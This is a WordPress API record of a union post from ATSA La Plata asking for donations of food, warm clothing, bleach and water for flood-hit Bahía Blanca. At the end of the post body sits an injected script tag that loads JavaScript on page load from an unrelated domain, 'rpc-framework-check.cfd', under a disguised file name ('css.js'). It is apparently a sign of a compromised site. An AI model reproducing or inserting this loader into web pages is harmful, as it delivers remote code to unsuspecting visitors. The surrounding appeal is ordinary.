{"id":18273,"date":"2025-03-10T10:51:23","date_gmt":"2025-03-10T13:51:23","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18273"},"modified":"2026-02-02T17:20:59","modified_gmt":"2026-02-02T20:20:59","slug":"sanidad-solidaria-juntos-por-bahia-blanca","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/03\/sanidad-solidaria-juntos-por-bahia-blanca\/","title":{"rendered":"Sanidad Solidaria, juntos por Bah\u00eda Blanca"},"content":{"rendered":"\n<p>Ante la dif\u00edcil situaci\u00f3n que atraviesa la localidad de Bah\u00eda Blanca, nos ponemos a disposici\u00f3n.<\/p>\n\n\n\n<p>Desde la Asociaci\u00f3n de Trabajadores de la Sanidad Argentina (ATSA) y nuestro compromiso solidario, creemos importante extender nuestro esp\u00edritu social y solidario hacia nuestros compatriotas bonaerenses.<\/p>\n\n\n\n<p>En este sentido, desde ATSA La Plata, estaremos recibiendo alimentos no perecederos, ropa de abrigo, lavandina, agua y otros art\u00edculos esenciales para hacerlos llegar a la localidad en este dif\u00edcil momento.<\/p>\n\n\n\n<p>Para colaborar acercate a nuestra Sede Social en calle 5 N\u00b0 375, o comunicate con tu delegado\/a gremial.<\/p>\n\n\n\n<p>Nadie se salva solo.<\/p>\n\n\n\n<p>Unidad, Organizaci\u00f3n y Solidaridad.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Para m\u00e1s consultas comunicarse a los tel\u00e9fonos 425-5167 \/ 425-9612 \/ 483-8573 interno 1105, Secretar\u00eda de Organizaci\u00f3n a cargo de Jorge Ropat<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__%5b0%5d=AZUGbwtF9Hwb3BKr1Jmd9xQB1Yu6K_lTaLdJr_3WBdVPFXfwaZrAiNkQRA3DIRLh3pAozXYD22J1VP-KNYq53-gSMKm_CdwcBkn25CJdSSxhy_8CXINgRycDUtCIuCKcPowPJlC4EQzZclhU0DzvGbwYfdyoGTmrhTi9cjU_RcmWsA&amp;__tn__=*NK-R\"><strong>#SanidadAtsaLaPlata<\/strong><\/a> <a href=\"https:\/\/www.facebook.com\/hashtag\/juntosporbah%C3%ADablanca?__eep__=6&amp;__cft__%5b0%5d=AZUGbwtF9Hwb3BKr1Jmd9xQB1Yu6K_lTaLdJr_3WBdVPFXfwaZrAiNkQRA3DIRLh3pAozXYD22J1VP-KNYq53-gSMKm_CdwcBkn25CJdSSxhy_8CXINgRycDUtCIuCKcPowPJlC4EQzZclhU0DzvGbwYfdyoGTmrhTi9cjU_RcmWsA&amp;__tn__=*NK-R\"><strong>#juntosporbah\u00edablanca<\/strong><\/a> <a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__%5b0%5d=AZUGbwtF9Hwb3BKr1Jmd9xQB1Yu6K_lTaLdJr_3WBdVPFXfwaZrAiNkQRA3DIRLh3pAozXYD22J1VP-KNYq53-gSMKm_CdwcBkn25CJdSSxhy_8CXINgRycDUtCIuCKcPowPJlC4EQzZclhU0DzvGbwYfdyoGTmrhTi9cjU_RcmWsA&amp;__tn__=*NK-R\"><strong>#SiempreJuntoAVos<\/strong><\/a><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Ante la dif\u00edcil situaci\u00f3n que atraviesa la localidad de Bah\u00eda Blanca, nos ponemos a disposici\u00f3n&#8230;.<\/p>\n","protected":false},"author":2,"featured_media":18274,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,146,98,147,97,85,148],"tags":[],"class_list":["post-18273","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-afiliado","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18273"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18273\/revisions"}],"predecessor-version":[{"id":20857,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18273\/revisions\/20857"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18274"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18273"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}